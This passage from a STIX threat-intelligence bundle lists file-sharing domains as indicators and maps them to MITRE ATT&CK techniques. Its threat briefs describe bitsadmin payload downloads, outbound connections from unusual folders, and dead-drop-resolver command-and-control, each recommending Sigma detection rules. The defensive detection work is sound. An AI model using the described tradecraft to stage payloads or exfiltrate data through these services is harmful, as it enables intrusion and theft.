      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: transfer.sh",
      "pattern": "[domain-name:value = 'transfer.sh']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4aeab60d-9aee-5977-b999-eb2a6ec8fb22",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--d70c3487-65a8-5b72-88e3-3c2b7b974dde"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--895e9d9c-5945-54c2-9680-30e39535fa33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: trycloudflare.com",
      "pattern": "[domain-name:value = 'trycloudflare.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a07320cf-86b9-5766-9f89-13ef0777b62c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--895e9d9c-5945-54c2-9680-30e39535fa33"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--70e150eb-16a7-50d2-94c3-0ece2437162d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ufile.io",
      "pattern": "[domain-name:value = 'ufile.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b7635432-4cc9-5f0b-bcae-4b3e27112fe2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--70e150eb-16a7-50d2-94c3-0ece2437162d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--93014276-2b8f-5d52-a478-4af1b818dd0e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: w3spaces.com",
      "pattern": "[domain-name:value = 'w3spaces.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--74529657-b25d-5a5e-8729-86a9ee17576b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--93014276-2b8f-5d52-a478-4af1b818dd0e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--952a4968-ba2c-5d9c-89fa-aaee62e57d07",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: workers.dev",
      "pattern": "[domain-name:value = 'workers.dev']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fc76a9a4-c271-5d78-abfc-27cdbd1d3a00",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--952a4968-ba2c-5d9c-89fa-aaee62e57d07"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--df6fb87f-6b13-5a42-a505-8725177c7fad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: x0.at",
      "pattern": "[domain-name:value = 'x0.at']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7cfa5c8e-57ba-587a-819d-3f78ac2742b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--df6fb87f-6b13-5a42-a505-8725177c7fad"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--477183ac-e0ef-567d-be60-d5cbb114344b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "BITS Jobs",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1197",
          "url": "https://attack.mitre.org/techniques/T1197"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e96baf8c-87f5-5f7f-9136-ea10b5fd858d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "attack-pattern--477183ac-e0ef-567d-be60-d5cbb114344b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--69b07132-5543-587f-b450-137586adbb54",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--710dc007-47bb-5785-99b2-b3163826b4bf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Download From File-Sharing Website Via Bitsadmin",
      "description": "## Overview\n\nAdversaries frequently abuse the Windows BITSAdmin utility to download additional tools and payloads, bypassing traditional security controls due to its nature as a legitimate, signed Microsoft binary. This technique allows attackers to perform ingress tool transfer (MITRE ATT\u0026CK T1105) from various file-sharing and cloud storage services like GitHub, Mega.nz, or Discord's CDN, making detection challenging. Observed in campaigns like Mint Sandstorm and by ransomware groups such as Hive, Conti, and AvosLocker, this method enables stealthy delivery of malware. The activity is particularly concerning when `bitsadmin.exe` initiates downloads from domains typically used for public file hosting, indicating a likely attempt to fetch staged malicious components after initial compromise. Detecting this behavior is crucial for identifying early stages of compromise and preventing further attacker progression.\n\n## Attack Chain\n\n1.  **Initial Access**: Adversaries gain initial access, often via phishing campaigns delivering malicious documents or exploiting a vulnerable internet-facing service, leading to arbitrary code execution.\n2.  **Execution**: A command interpreter (e.g., `cmd.exe` or `powershell.exe`) is executed with administrative privileges to launch subsequent commands.\n3.  **Ingress Tool Transfer**: The `bitsadmin.exe` utility is invoked with parameters like `/transfer`, `/create`, or `/addfile` to initiate a background download.\n4.  **Staging Payload**: `bitsadmin.exe` downloads a malicious executable, script, or DLL from a suspicious file-sharing or cloud storage domain (e.g., `dl.dropboxusercontent.com`, `cdn.discordapp.com`, `mega.nz`) to a temporary or public-facing directory on the compromised system.\n5.  **Further Execution**: The newly downloaded malicious payload is then executed, often via another command or script, to establish persistence or escalate privileges.\n6.  **Impact**: The execution of the payload leads to the final objective, which commonly includes deploying ransomware, exfiltrating sensitive data, or establishing long-term command and control within the victim's network.\n\n## Impact\n\nSuccessful exploitation of this technique can lead to severe consequences, as it facilitates the delivery of sophisticated malware, including ransomware, backdoors, and credential stealers. Organizations targeted by such attacks, particularly those in critical infrastructure sectors or government, face significant data loss, operational disruption, and financial repercussions. Campaigns like Mint Sandstorm have targeted high-profile individuals at universities and research organizations, indicating a focus on sensitive intellectual property. The use by ransomware groups such as Hive, Conti, and AvosLocker highlights the potential for widespread encryption of systems and extortion demands, resulting in costly recovery efforts and reputational damage for affected entities.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to your SIEM and tune for your environment to detect `bitsadmin.exe` downloading from suspicious domains.\n*   Monitor `process_creation` logs for `bitsadmin.exe` execution and analyze command-line arguments for suspicious URLs.\n*   Review network logs and proxy data for connections originating from `bitsadmin.exe` to the IOC domains listed below.\n*   Implement application whitelisting to restrict `bitsadmin.exe` usage to only approved scenarios or accounts.\n*   Educate users on phishing awareness, as this technique often follows an initial access gained through social engineering.\n",
      "published": "2026-07-03T15:08:55Z",
      "labels": [
        "living-off-the-land",
        "lolbas",
        "payload-delivery",
        "ingress-tool-transfer",
        "command-and-control",
        "windows"
      ],
      "object_refs": [
        "indicator--b0488b87-7271-5131-a98c-68689e62b554",
        "indicator--ab9f69f3-2cf9-553f-ba7e-b17ce23f4791",
        "indicator--26934a76-bd3a-5401-9fe4-dc026a9fd724",
        "indicator--0b6bd0a8-de6b-5d40-8c25-223685b5a043",
        "indicator--45d427d5-9fa1-5eab-8bfc-c574ad1f0e7d",
        "indicator--091e1cf6-e1f1-50ea-bcd0-da33fdd76223",
        "indicator--b5688c41-dbd7-5533-b399-d052ab2f31aa",
        "indicator--0420de0d-a2d3-54db-a2e8-f2fa71b4bbe2",
        "indicator--d6131f89-b30c-5b13-846d-0f710bbd43e3",
        "indicator--fb3582d4-c97d-575d-a1df-366f5052ef30",
        "indicator--275f4c81-7a59-576b-86a1-c9096ae958a5",
        "indicator--637a189d-cc7d-5080-8d7a-cdd277aa781a",
        "indicator--107fc446-0e22-5ab9-9ac0-14d3f47bc629",
        "indicator--c2c29937-69bd-5ade-961f-604e717a1b1d",
        "indicator--410bfc51-fa0d-5094-8fb1-d4ebc6c83c3a",
        "indicator--38d9eb0e-bd86-5d3a-be30-738f470f432d",
        "indicator--fde9288e-72c5-5de5-ba2c-477b9e707f54",
        "indicator--88234851-368d-5265-a58f-a5a6833fe001",
        "indicator--f4b9f348-8506-5b62-845a-4bfb99fe1c2c",
        "indicator--e29ec9c0-3200-5934-bfca-9d9a605152c6",
        "indicator--00a62b3c-0e04-58ff-9a7a-807eda400f00",
        "indicator--7b4783c5-4063-52a5-8e70-84345650c50d",
        "indicator--40776a06-81b4-5861-b649-801a40da7a6a",
        "indicator--d49ad98e-8667-597d-ac13-72fdc2dc2c8c",
        "indicator--ea46769f-fa52-55d2-bba1-dabdafe525b0",
        "indicator--2958a7e8-3c5f-502c-acb1-fd67952f42a2",
        "indicator--8712b1c7-ef54-5aba-b7c9-5f69f60ee7de",
        "indicator--ec9d72b1-43cc-5695-a3dd-4675d7f5c41a",
        "indicator--e5ecebb9-a9f0-5570-bf71-d0abcc2951e8",
        "indicator--d70c3487-65a8-5b72-88e3-3c2b7b974dde",
        "indicator--895e9d9c-5945-54c2-9680-30e39535fa33",
        "indicator--70e150eb-16a7-50d2-94c3-0ece2437162d",
        "indicator--93014276-2b8f-5d52-a478-4af1b818dd0e",
        "indicator--952a4968-ba2c-5d9c-89fa-aaee62e57d07",
        "indicator--df6fb87f-6b13-5a42-a505-8725177c7fad",
        "attack-pattern--477183ac-e0ef-567d-be60-d5cbb114344b",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin"
        },
        {
          "source_name": "reference",
          "url": "https://isc.sans.edu/diary/22264"
        },
        {
          "source_name": "reference",
          "url": "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"
        },
        {
          "source_name": "reference",
          "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker"
        },
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a"
        },
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--12834d45-4eb1-5e61-89bd-715a10a65312",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5edc8de7-4ff4-5eb0-94ca-4a6b4f05e48b",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5edc8de7-4ff4-5eb0-94ca-4a6b4f05e48b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location",
      "description": "## Overview\n\nThis threat brief focuses on detecting anomalous network activity where a process initiates a connection from an unusual or suspicious file system location on a Windows system. Adversaries commonly leverage such directories, including recycle bins, temporary folders, public user folders, or system profile paths, to evade detection by disguising malicious binaries or scripts as legitimate files. The observed behavior often serves as an early indicator of compromise, suggesting malware execution, ingress tool transfer (e.g., downloading additional payloads), or the establishment of command and control (C2) communication. Detecting these connections is crucial for identifying unauthorized software execution and preventing further stages of an attack, such as data exfiltration or lateral movement, by catching the initial outbound communication.\n\n## Impact\n\nSuccessful execution of malicious processes from suspicious locations leading to network connections can have severe consequences, including full system compromise, data exfiltration, and the establishment of persistent backdoors. This activity often precedes the deployment of ransomware, wipers, or other destructive payloads, leading to significant financial losses, operational disruption, and reputational damage for affected organizations. Without timely detection, attackers can maintain a foothold, escalate privileges, and spread across the network unimpeded.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location\" to your SIEM and tune for your environment to detect anomalous network connections.\n*   Ensure `network_connection` logs are enabled for your Windows endpoints, preferably through Sysmon or a robust EDR solution, to provide the necessary telemetry for the detection rule.\n*   Investigate all alerts generated by the provided Sigma rule, paying close attention to the `Image` path and the `DestinationHostname` to identify potentially malicious processes or C2 infrastructure.\n*   Review processes executing from directories like `C:\\$Recycle.bin`, `C:\\Temp\\`, `C:\\Users\\Public\\`, or `C:\\Windows\\Tasks\\` that attempt to make outbound network connections.\n",
      "published": "2026-07-03T15:07:52Z",
      "labels": [
        "endpoint",
        "detection",
        "command-and-control",
        "malware"
      ],
      "object_refs": [
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/network_connection/net_connection_win_susp_initiated_uncommon_or_suspicious_locations.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--67e9066d-5417-531c-90ce-2e3ef0c8a00a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3a53627d-4bab-5416-a945-31d556386616",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dcdcf3b1-e464-57f4-b01c-6d7c30d6ff8a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3a53627d-4bab-5416-a945-31d556386616",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3a53627d-4bab-5416-a945-31d556386616",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Process Communication to File Sharing Domains from Unusual Folders",
      "description": "## Overview\n\nThis threat brief focuses on a common tactic employed by various threat actors, including ransomware groups like Hive, Conti, and AvosLocker, to exfiltrate data or maintain Command and Control (C2) communication. The technique involves malicious executables launching from specific, often temporary or system-generated, directories on Windows systems, then establishing outbound network connections to well-known public file-sharing services or code hosting platforms. This behavior is a strong indicator of compromise, as legitimate applications rarely operate from these locations while simultaneously communicating with such domains for core functionality. Defenders should prioritize detecting such activity, as it often precedes significant data loss or further stages of an attack.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains initial access to a system, typically through phishing, exploitation of a vulnerability, or a compromised legitimate application.\n2.  **Execution**: A malicious payload is executed on the compromised system, often dropped and launched from a non-standard or temporary location such as `$Recycle.bin`, `Temp`, `Users\\Public`, or `Windows\\Tasks`.\n3.  **Persistence**: The malware may establish persistence by placing itself or a loader within these suspicious directories to ensure execution across reboots, potentially leveraging system utilities or scheduled tasks.\n4.  **Command and Control (C2) Setup**: The malicious process, now running from an unusual path, initiates outbound network connections to domains associated with public file-sharing services or code repositories (e.g., `githubusercontent.com`, `mega.nz`, `anonfiles.com`).\n5.  **Exfiltration/Payload Delivery**: These established connections are then leveraged to exfiltrate sensitive data from the compromised system or to download additional malicious components and commands from the attacker's infrastructure hosted on these public services.\n6.  **Impact**: The successful exfiltration of data leads to data theft, potential regulatory fines, reputational damage, or further compromise of the organization's network and assets through additional malware deployment.\n\n## Impact\n\nThe observed impact of this attack pattern includes significant data exfiltration, leading to intellectual property theft, exposure of sensitive customer or employee data, and compliance violations. Furthermore, these connections often facilitate the download of additional payloads, such as ransomware or other destructive malware, leading to system encryption, operational disruption, and high recovery costs. While specific victim counts are not tied to this generic detection pattern, it has been leveraged in numerous high-profile campaigns against organizations across all sectors, as highlighted by CISA alerts regarding ransomware groups like Hive, Conti, and AvosLocker, where similar exfiltration methods were observed.\n\n## Recommendation\n\n*   Deploy the Sigma rule `Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder` to your SIEM and tune for your environment.\n*   Ensure Sysmon network connection logging is enabled to capture `network_connection` events for the rule above.\n*   Review the `falsepositives` section of the rule and baseline any legitimate executables that might operate from the specified suspicious directories.\n*   Implement egress filtering at the network perimeter to restrict outbound connections to known malicious domains or to only allow necessary business-related file-sharing services.\n",
      "published": "2026-07-03T15:07:10Z",
      "labels": [
        "exfiltration",
        "command-and-control",
        "windows",
        "malware",
        "detection-pattern"
      ],
      "object_refs": [
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://twitter.com/M_haggis/status/900741347035889665"
        },
        {
          "source_name": "reference",
          "url": "https://twitter.com/M_haggis/status/1032799638213066752"
        },
        {
          "source_name": "reference",
          "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker"
        },
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1102",
          "url": "https://attack.mitre.org/techniques/T1102"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0c41f755-ca50-5ea2-aa14-04c61cd598f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--55991651-1ab2-5e09-81ba-faf92b0b05c5",
      "target_ref": "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--55991651-1ab2-5e09-81ba-faf92b0b05c5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of Unauthorized Connections to Dead Drop Resolver Domains",
      "description": "## Overview\n\nThis intelligence focuses on a command and control (C2) technique employed by various threat actors known as \"dead drop resolvers.\" Attackers leverage legitimate and popular online services, such as social media platforms, cloud storage, or code-hosting sites (e.g., `facebook.com`, `youtube.com`, `reddit.com`, `githubusercontent.com`), as an intermediary for C2 communications or data exfiltration. The technique involves a non-browser or unknown application initiating network connections to these trusted domains. By blending malicious traffic with legitimate web activity to well-known sites, adversaries aim to bypass network perimeter defenses and security monitoring that typically allow connections to such services. This method significantly complicates detection and attribution, as the network traffic appears benign at first glance, making it a persistent challenge for defenders seeking to identify covert operations.\n\n## Attack Chain\n\n1.  **Initial Compromise and Execution:** A victim system is compromised, leading to the execution of a malicious executable. The specific initial access vector (e.g., phishing, exploit) is not detailed here but precedes this stage.\n2.  **Malware Activation:** The malicious executable, designed to operate without user interaction or as a background process, begins its operations on the infected host.\n3.  **Initiate Covert Communication:** The malware attempts to establish an outbound network connection to a legitimate, popular internet domain (e.g., `reddit.com`, `discord.com`, `githubusercontent.com`) that has been co-opted as a dead drop resolver.\n4.  **Dead Drop Resolver Interaction:** Instead of direct C2, the malware interacts with a specific public resource (e.g., a hidden post, comment, or public file) on the legitimate service to retrieve commands or deposit exfiltrated data.\n5.  **Command Retrieval/Data Staging:** The malware parses information from the dead drop resolver to receive instructions for further malicious activities or stages data for exfiltration to another location on the service.\n6.  **Action on Objectives:** Based on the retrieved commands, the malware performs actions such as data collection, credential theft, privilege escalation, or lateral movement within the network.\n7.  **Data Exfiltration (Optional):** Collected sensitive data may be uploaded back to the dead drop resolver or another legitimate service, camouflaged as normal user activity.\n8.  **Persistent C2:** The dead drop resolver technique maintains a resilient and covert C2 channel, allowing the adversary to sustain access and control over the compromised system.\n\n## Impact\n\nIf an adversary successfully establishes command and control (C2) using dead drop resolvers, the primary impact is covert persistence within the victim's network. This technique allows threat actors to exfiltrate sensitive data over extended periods without detection, potentially leading to significant data breaches, intellectual property theft, or competitive disadvantage. Furthermore, a stable C2 channel facilitates the deployment of additional malware, lateral movement to other systems, and the potential for widespread network compromise, including ransomware deployment. The stealthy nature of this C2 mechanism means that organizations may remain unaware of the breach for prolonged periods, increasing the cost and complexity of incident response.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"New Connection Initiated To Potential Dead Drop Resolver Domain\" to your SIEM and tune for your environment to detect unauthorized processes connecting to suspicious legitimate domains.\n*   Ensure comprehensive `network_connection` logging is enabled on all Windows endpoints, including process path and destination hostnames, to facilitate detection by the above rule.\n*   Review network traffic logs for connections to domains listed in the rule's `selection` block originating from non-browser or non-standard applications and investigate any anomalies.\n*   Implement application whitelisting to restrict executable execution to only approved applications, thereby preventing unknown or malicious executables from initiating outbound connections.\n*   Analyze false positives from the rule (e.g., custom applications or security tools) and add them to the filter for more accurate alerting.\n",
      "published": "2026-07-03T15:06:20Z",
      "labels": [
        "command-and-control",
        "network-connection",
        "dead-drop-resolver",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://web.archive.org/web/20220830134315/https://content.fireeye.com/apt-41/rpt-apt41/"
        },
        {
          "source_name": "reference",
          "url": "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/"
        },
        {
          "source_name": "reference",
          "url": "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/kleiton0x00/RedditC2"
        },
        {
          "source_name": "reference",
          "url": "https://twitter.com/kleiton0x7e/status/1600567316810551296"
        },
        {
          "source_name": "reference",
          "url": "https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hide Artifacts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1564",
          "url": "https://attack.mitre.org/techniques/T1564"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c7db8644-b50d-55f5-b655-dcb2ead59a29",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f6d10496-7a65-5c0f-ba25-bf0cbe347e0c",
      "target_ref": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c81aa762-ba75-5037-8f4b-d2b0d38544de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f6d10496-7a65-5c0f-ba25-bf0cbe347e0c",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0ea1584e-4a32-59bf-bef8-108c5828fa4e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f6d10496-7a65-5c0f-ba25-bf0cbe347e0c",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f6d10496-7a65-5c0f-ba25-bf0cbe347e0c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unusual File Download From File Sharing Websites - File Stream",
      "description": "## Overview\n\nThis threat brief focuses on a behavioral detection designed to identify suspicious file downloads from public file and paste sharing websites. Attackers frequently leverage legitimate services like GitHub, Mega.nz, Pastebin, or Discord to host malicious payloads, command and control configurations, or exfiltrated data. This method allows them to bypass traditional network filtering and evade detection by blending in with legitimate traffic. The detection specifically targets files with common scripting extensions (`.bat`, `.cmd`, `.ps1`) that also carry the `Zone.Identifier` Alternate Data Stream, a Windows mechanism indicating a file's origin from the internet. The presence of this stream on executable or script files downloaded from untrusted public sources is a strong indicator of potential malicious activity, such as the delivery of initial access payloads, second-stage malware, or tools for persistence. Defenders should be aware that such downloads are often precursors to full system compromise.\n\n## Attack Chain\n\n1.  Initial access is achieved, potentially via a phishing campaign, compromised 